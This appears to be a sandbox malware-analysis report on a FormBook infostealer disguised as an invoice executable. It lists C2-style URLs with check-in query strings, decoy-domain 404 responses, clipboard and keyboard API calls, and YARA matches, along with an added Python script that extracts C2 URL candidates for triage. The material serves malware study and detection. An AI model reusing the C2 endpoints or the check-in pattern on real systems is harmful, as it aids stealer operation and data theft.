6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 
3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 16 Sep 2024 07:32:07 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 16 Sep 2024 07:32:10 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 16 Sep 2024 07:32:13 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 16 Sep 2024 07:32:18 GMT
                Server: Apache
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 16 Sep 2024 07:32:23 GMT
                Server: Apache
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004984000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000039C4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj
            Source: bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.wajf.net
            Source: bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.wajf.net/zl4r/
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.0000000003832000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: TapiUnattend.exe, 00000006.00000003.2320633515.0000000007C0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
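FormBook's check-in is a GET to a short random directory under each configured domain with a query string of a random key and a base64-like value, and most of the configured domains are decoys that answer 404, which is the shape of the responses above; the request for one domain survives in the memory of two processes as the string http://newdaydawning.net/72tr/?4RLhs=...&h2Pt9=.... The script below is an added example, not part of the Joe Sandbox report: it takes "String found in binary or memory" entries copied from this page (a constructed sample), keeps the URLs that have a 4-character directory directly under the host, and records the query keys and the processes holding each one. The 4-character-directory rule is an assumption generalised from the two URLs on this page, not a definitive FormBook signature.

```python
"""Pull FormBook-style C2 URL candidates out of the 'String found in binary or
memory' entries of a Joe Sandbox report and note which processes hold them.

Added example, not part of the report. The URL shape (a 4-character directory
directly under the host, optionally followed by '?key=value&key=value') is an
assumption generalised from the two URLs on this page, not a definitive
FormBook signature.
"""
import re

# Constructed sample: entries copied from the report above. The report's own
# text runs the memory-region id straight into the 'String found ...' label.
SAMPLE_REPORT = """\
Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004984000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000039C4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj
Source: bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wajf.net
Source: bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wajf.net/zl4r/
Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
"""

STRING_MARKER = "String found in binary or memory:"
PROCESS_RE = re.compile(r"\b([A-Za-z0-9_.-]+\.exe)\b")
# scheme://host/<4 alnum chars>/ then either '?query' or the end of the token
C2_URL_RE = re.compile(
    r"https?://(?P<host>[A-Za-z0-9.-]+)/(?P<path>[a-z0-9]{4})/"
    r"(?:\?(?P<query>\S*))?(?=\s|$)"
)


def parse_string_entries(report_text):
    """Yield (processes, found_string) for every 'String found in binary or memory' line."""
    for line in report_text.splitlines():
        if STRING_MARKER not in line:
            continue
        prefix, found = line.split(STRING_MARKER, 1)
        processes = list(dict.fromkeys(PROCESS_RE.findall(prefix)))  # de-dup, keep order
        yield processes, found.strip()


def extract_c2_candidates(report_text):
    """Return one record per host/directory that matches the C2 URL shape."""
    candidates = {}
    for processes, found in parse_string_entries(report_text):
        for m in C2_URL_RE.finditer(found):
            key = f"{m['host']}/{m['path']}"
            rec = candidates.setdefault(
                key, {"host": m["host"], "path": m["path"], "query_keys": [], "processes": []})
            for part in (m["query"] or "").split("&"):
                k = part.split("=", 1)[0]
                if k and k not in rec["query_keys"]:
                    rec["query_keys"].append(k)
            for p in processes:
                if p not in rec["processes"]:
                    rec["processes"].append(p)
    return list(candidates.values())


if __name__ == "__main__":
    for rec in extract_c2_candidates(SAMPLE_REPORT):
        print(f"{rec['host']}/{rec['path']}/  keys={rec['query_keys']}  in={rec['processes']}")
```

On the sample above this yields newdaydawning.net/72tr (query keys 4RLhs and h2Pt9, held by both TapiUnattend.exe and bJWYsPIiPtg.exe) and www.wajf.net/zl4r. The ecosia, duckduckgo, yahoo and login.live.com strings do not have that shape and fall through; they look like browser search-provider and sign-in configuration rather than C2, which is the noise you expect next to a stealer's own strings.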
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0037EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0037EAFF
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0037ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0037ED6A
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0036AA57
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00399576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00399576

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
